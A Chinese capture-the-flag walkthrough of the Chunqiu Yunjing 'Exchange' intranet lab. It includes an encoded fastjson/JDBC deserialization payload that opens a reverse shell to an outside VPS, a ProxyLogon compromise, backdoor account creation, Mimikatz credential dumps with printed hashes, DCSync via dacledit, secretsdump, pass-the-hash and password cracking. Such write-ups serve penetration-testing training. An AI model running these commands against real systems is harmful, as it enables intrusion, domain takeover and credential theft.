【内网渗透】最保姆级的春秋云镜Exchange打靶笔记

目录

flag1

flag2

flag3 

flag4

---

flag1

fscan扫外网

访问8000端口->官方网站 

Java 代码审计之华夏 ERP CMS v2.3 | Drunkbaby's Blog

admin/123456弱口令

打/user/list?search=的jdbc+fj反序列化

vps搭一个MySQL_Fake_Server

payload:

/user/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%31%32%34%2e%32%32%32%2e%31%33%36%2e%33%33%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%38%78%4d%7a%4d%33%49%44%41%2b%4a%6a%45%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d%0a

cat /root/flag/flag01.txt

flag2

wget下载fscan和frp，扫内网，搭隧道

172.22.3.12 本机
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC

 proxylogon打exchange server拿到SYSTEM权限

 创建一个用户rdp上去拿flag

net user Z3r4y 0x401@admin /add
net localgroup administrators Z3r4y /add

 

flag3 

 Exchange 机器账户默认对域内成员具有 WriteDACL 权限, 可以写 DCSync

传一个猕猴桃，以管理员身份运行

privilege::debug
sekurlsa::logonpasswords

总结下有用的：

 * Username : XIAORANG-EXC01$
 * Domain   : XIAORANG
 * NTLM     : 63bb769f8b788233f66fc95d25b394cc
 * SHA1     : fab946704b39540fa89f56f53cd65e421d933fcc

 * Username : Zhangtong
 * Domain   : XIAORANG
 * NTLM     : 22c7f81993e96ac83ac2f3f1903de8b4
 * SHA1     : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
 * DPAPI    : ed14c3c4ef895b1d11b04fb4e56bb83b

proxychains4 python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :63bb769f8b788233f66fc95d25b394cc -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

将DCSync权限（用于域同步和密码哈希提取）授予 Zhangtong 账户，目标域为 xiaorang.lab，操作通过IP地址为 172.22.3.2 的域控制器完成。 

 拿Zhangtong去dump域管哈希

proxychains4 impacket-secretsdump xiaorang.lab/[email protected] -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

pth拿dc

proxychains4 impacket-smbexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/[email protected] -codec gbk

flag4

proxychains4 impacket-smbclient -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb xiaorang.lab/[email protected] -dc-ip 172.22.3.2

smbclient横向26，Lumia用户桌面有个secret.zip

zip里是flag文件 

pthexchange导出Lumia mailbox里面的全部邮件以及附件

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

邮件提示压缩包是用电话号码加密的

下载另一个邮件的csv附件

 写一个脚本提取出phone字段

import csv

# 定义存放电话号码的列表
phone_numbers = []

# 读取CSV文件
with open('phone lists.csv', 'r') as file:
    reader = csv.DictReader(file)  # 使用 DictReader 方便按列名提取数据
    for row in reader:
        phone_numbers.append(row['phone'])  # 提取 phone 列的值并加入列表

# 输出提取的电话号码
for phone in phone_numbers:
    print(phone)

# 如果需要将电话写入到新的文件，也可以这样操作：
with open('extracted_phones.txt', 'w') as output_file:
    for phone in phone_numbers:
        output_file.write(phone + '\n')

爆出密码为18763918468

zip2john secret.zip >zip.txt
john --wordlist=extracted_phones.txt zip.txt

 拿到flag